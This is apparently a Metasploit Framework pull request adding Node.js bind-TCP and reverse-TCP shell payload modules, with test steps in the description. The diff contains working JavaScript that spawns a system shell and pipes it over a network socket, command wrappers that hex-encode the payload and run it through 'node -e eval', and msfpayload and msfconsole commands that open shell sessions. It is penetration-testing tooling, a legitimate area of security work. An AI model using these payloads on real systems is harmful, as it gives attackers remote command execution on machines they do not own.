### PR TITLE
Adds bind and cmd payloads for nodejs.

### DIFF
--- a/modules/payloads/singles/cmd/unix/bind_nodejs.rb
+++ b/modules/payloads/singles/cmd/unix/bind_nodejs.rb
@@ -1,0 +1,43 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+require 'msf/core/handler/bind_tcp'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit3
+
+  include Msf::Payload::Single
+  include Msf::Sessions::CommandShellOptions
+
+  def initialize(info = {})
+    super(merge_info(info,
+      'Name'        => 'Unix Command Shell, Bind TCP (via nodejs)',
+      'Description' => 'Continually listen for a connection and spawn a command shell via nodejs',
+      'Author'      => 'joev',
+      'License'     => MSF_LICENSE,
+      'Platform'    => 'unix',
+      'Arch'        => ARCH_CMD,
+      'Handler'     => Msf::Handler::BindTcp,
+      'Session'     => Msf::Sessions::CommandShell,
+      'PayloadType' => 'cmd',
+      'RequiredCmd' => 'node',
+      'Payload'     => { 'Offsets' => {}, 'Payload' => '' }
+    ))
+  end
+
+  def generate
+    super + command_string
+  end
+
+  def command_string
+    payload = framework.payloads.create('nodejs/shell_bind_tcp')
+    payload.datastore.merge! datastore
+    "node -e 'eval(\"#{Rex::Text.to_hex(payload.generate, "\\x")}\");'"
+  end
+end

--- a/modules/payloads/singles/cmd/unix/reverse_nodejs.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_nodejs.rb
@@ -1,0 +1,43 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+require 'msf/core/handler/reverse_tcp'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit3
+
+  include Msf::Payload::Single
+  include Msf::Sessions::CommandShellOptions
+
+  def initialize(info = {})
+    super(merge_info(info,
+      'Name'        => 'Unix Command Shell, Reverse TCP (via nodejs)',
+      'Description' => 'Continually listen for a connection and spawn a command shell via nodejs',
+      'Author'      => 'joev',
+      'License'     => MSF_LICENSE,
+      'Platform'    => 'unix',
+      'Arch'        => ARCH_CMD,
+      'Handler'     => Msf::Handler::ReverseTcp,
+      'Session'     => Msf::Sessions::CommandShell,
+      'PayloadType' => 'cmd',
+      'RequiredCmd' => 'node',
+      'Payload'     => { 'Offsets' => {}, 'Payload' => '' }
+    ))
+  end
+
+  def generate
+    super + command_string
+  end
+
+  def command_string
+    payload = framework.payloads.create('nodejs/shell_reverse_tcp')
+    payload.datastore.merge! datastore
+    "node -e 'eval(\"#{Rex::Text.to_hex(payload.generate, "\\x")}\");'"
+  end
+end

--- a/modules/payloads/singles/nodejs/shell_bind_tcp.rb
+++ b/modules/payloads/singles/nodejs/shell_bind_tcp.rb
@@ -10,7 +10,7 @@
 # settle for just getting shells on nodejs.
 
 require 'msf/core'
-require 'msf/core/handler/reverse_tcp'
+require 'msf/core/handler/bind_tcp'
 require 'msf/base/sessions/command_shell'
 
 module Metasploit3

--- a/modules/payloads/singles/nodejs/shell_bind_tcp.rb
+++ b/modules/payloads/singles/nodejs/shell_bind_tcp.rb
@@ -1,0 +1,68 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+# It would be better to have a commonjs payload, but because the implementations
+# differ so greatly when it comes to require() paths for net modules, we will
+# settle for just getting shells on nodejs.
+
+require 'msf/core'
+require 'msf/core/handler/reverse_tcp'
+require 'msf/base/sessions/command_shell'
+
+module Metasploit3
+
+  include Msf::Payload::Single
+  include Msf::Sessions::CommandShellOptions
+
+  def initialize(info = {})
+    super(merge_info(info,
+      'Name'          => 'Command Shell, Bind TCP (via nodejs)',
+      'Description'   => 'Creates an interactive shell via nodejs',
+      'Author'        => ['joev'],
+      'License'       => BSD_LICENSE,
+      'Platform'      => 'nodejs',
+      'Arch'          => ARCH_NODEJS,
+      'Handler'       => Msf::Handler::BindTcp,
+      'Session'       => Msf::Sessions::CommandShell,
+      'PayloadType'   => 'nodejs',
+      'Payload'       => { 'Offsets' => {}, 'Payload' => '' }
+    ))
+  end
+
+  #
+  # Constructs the payload
+  #
+  def generate
+    super + command_string
+  end
+
+  #
+  # Returns the JS string to use for execution
+  #
+  def command_string
+    cmd   = <<EOS
+(function(){
+  var require = global.require || global.process.mainModule.constructor._load;
+  if (!require) return;
+
+  var cmd = (global.process.platform.match(/^win/i)) ? "cmd" : "/bin/sh";
+  var net = require("net"),
+      cp = require("child_process"),
+      util = require("util");
+
+  var server = net.createServer(function(socket) {  
+    var sh = cp.spawn(cmd, []);
+    socket.pipe(sh.stdin);
+    util.pump(sh.stdout, socket);
+    util.pump(sh.stderr, socket);
+  });
+  server.listen(#{datastore['LPORT']});
+})();
+EOS
+    return "#{cmd.gsub("\n",'').gsub(/\s+/,' ').gsub(/[']/, '\\\\\'')}"
+  end
+end


### PR DESCRIPTION
This PR:
- Adds a reverse_tcp and bind_tcp CMD payload
- Adds a bind payload (no bind_ssl for now).

For this PR, assume my IP is `1.1.1.1`.
#### Verify nodejs bind_tcp single payload:
- [ ] Generate and run the bind payload:

```
./msfpayload nodejs/shell_bind_tcp LPORT=5555 LHOST=1.1.1.1 R | node
```
- [ ] Set up the handler and attempt to connect:

```
msf> set payload nodejs/shell_bind_tcp
msf> set RHOST 1.1.1.1
msf> set LPORT 5555
msf> exploit
```
- [ ] Verify you get a shell:

```
[*] Command shell session 12 opened (1.1.1.1:49825 -> 1.1.1.1:5555) at 2013-10-07 12:31:19 -0500
```
#### Verify nodejs bind_tcp cmd payload
- [ ] Generate and run the bind payload:

```
./msfpayload cmd/unix/bind_nodejs LPORT=5555 LHOST=1.1.1.1 R | bash
```
- [ ] Set up the handler and attempt to connect

```
./msfconsole
msf> use exploit/multi/handler
msf> set payload cmd/unix/bind_nodejs
msf> set RHOST 1.1.1.1
msf> set RPORT 5555
msf> run
```
- [ ] Verify you get a shell:

```
[*] Command shell session 10 opened (1.1.1.1:64414 -> 1.1.1.1:5555) at 2013-10-07 12:18:14 -0500
```
#### Verify nodejs reverse_tcp cmd payload
- [ ] Set up and run the handler

```
./msfconsole
msf> use exploit/multi/handler
msf> set payload cmd/unix/reverse_nodejs
msf> set LHOST 1.1.1.1
msf> set LPORT 5555
msf> run
```
- [ ] Generate and run the reverse_tcp payload:

```
./msfpayload cmd/unix/reverse_nodejs LPORT=5555 LHOST=1.1.1.1 R | bash
```
- [ ] Verify you get a shell:

```
[*] Command shell session 11 opened (1.1.1.1:5555 -> 1.1.1.1:65510) at 2013-10-07 12:24:49 -0500
```
